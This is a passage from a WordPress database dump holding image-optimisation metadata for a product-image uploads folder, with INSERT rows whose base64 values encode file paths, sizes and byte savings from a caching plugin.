MjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWxlY3RyaWNhbC1jb250YWN0LWx1YnJpY2FudC0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZWxlY3RyaWNhbC1jb250YWN0LWx1YnJpY2FudC0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUzNTY1LCJpZCI6MTg0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTM1NjgsImlkIjoxODQ2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWxlY3RyaWNhbC1jb250YWN0LWx1YnJpY2FudC0xLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWxlY3RyaWNhbC1jb250YWN0LWx1YnJpY2FudC0xLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZWxlY3RyaWNhbC1jb250YWN0LWx1YnJpY2FudC0xLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUzNTcxLCJpZCI6MTg0Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VsZWN0cmljYWwtY29udGFjdC1sdWJyaWNhbnQtMS00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VsZWN0cmljYWwtY29udGFjdC1sdWJyaWNhbnQtMS00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2VsZWN0cmljYWwtY29udGFjdC1sdWJyaWNhbnQtMS00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MzU3NCwiaWQiOjE4NDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTEtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWxlY3RyaWNhbC1jb250YWN0LWx1YnJpY2FudC0xLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTEtOTB4OTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUzNTc2LCJpZCI6MTg0Nn1d'); 
INSERT INTO `wp_postmeta` VALUES (29092, 1835, 'wpfc_optimisation_reduction', '20271'); 
INSERT INTO `wp_postmeta` VALUES (29093, 1835, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0yLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0yLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTM1ODEsImlkIjoiMTgzNSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0yLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0yLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUyVS0yLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3MzAsInRpbWUiOjE0ODM1NTM1ODQsImlkIjoxODM1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMi04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MlUtMi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjUwMiwidGltZSI6MTQ4MzU1MzU4OCwiaWQiOjE4MzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0yLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0yLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUyVS0yLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyMjQ4LCJ0aW1lIjoxNDgzNTUzNTkxLCJpZCI6MTgzNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0yLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTJVLTItMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTAzMDcsInRpbWUiOjE0ODM1NTM1OTUsImlkIjoxODM1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MlUtMi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NDk4LCJ0aW1lIjoxNDgzNTUzNTk4LCJpZCI6MTgzNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTJVLTItMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ0MiwidGltZSI6MTQ4MzU1MzYwMiwiaWQiOjE4MzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0yLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0yLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUyVS0yLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NzEsInRpbWUiOjE0ODM1NTM2MDUsImlkIjoxODM1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MlUtMi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTM5OCwidGltZSI6MTQ4MzU1MzYwOSwiaWQiOjE4MzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTItMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTItMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTJVLTItMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU2MiwidGltZSI6MTQ4MzU1MzYxMiwiaWQiOjE4MzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTItNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTItNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTJVLTItNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjczOCwidGltZSI6MTQ4MzU1MzYxNSwiaWQiOjE4MzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTItOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0yLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTJVLTItOTB4OTAuanBnIiwicmVkdWN0aW9uIjozNzUsInRpbWUiOjE0ODM1NTM2MTgsImlkIjoxODM1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29094, 1833, 'wpfc_optimisation_reduction', '20271'); 
INSERT INTO `wp_postmeta` VALUES (29095, 1833, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0xLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTM2MjMsImlkIjoiMTgzMyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUyVS0xLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3MzAsInRpbWUiOjE0ODM1NTM2MjYsImlkIjoxODMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MlUtMS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjUwMiwidGltZSI6MTQ4MzU1MzYzMCwiaWQiOjE4MzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0xLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0xLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUyVS0xLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyMjQ4LCJ0aW1lIjoxNDgzNTUzNjMzLCJpZCI6MTgzM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0xLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTJVLTEtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTAzMDcsInRpbWUiOjE0ODM1NTM2MzcsImlkIjoxODMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MlUtMS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NDk4LCJ0aW1lIjoxNDgzNTUzNjQxLCJpZCI6MTgzM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTJVLTEtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ0MiwidGltZSI6MTQ4MzU1MzY0NCwiaWQiOjE4MzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUyVS0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NzEsInRpbWUiOjE0ODM1NTM2NDcsImlkIjoxODMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MlUtMS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTM5OCwidGltZSI6MTQ4MzU1MzY1MSwiaWQiOjE4MzN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTEtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTEtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTJVLTEtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU2MiwidGltZSI6MTQ4MzU1MzY1NCwiaWQiOjE4MzN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTEtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTEtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTJVLTEtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjczOCwidGltZSI6MTQ4MzU1MzY1NywiaWQiOjE4MzN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTEtOTB4OTAuanBnIiwiZmlsZSI6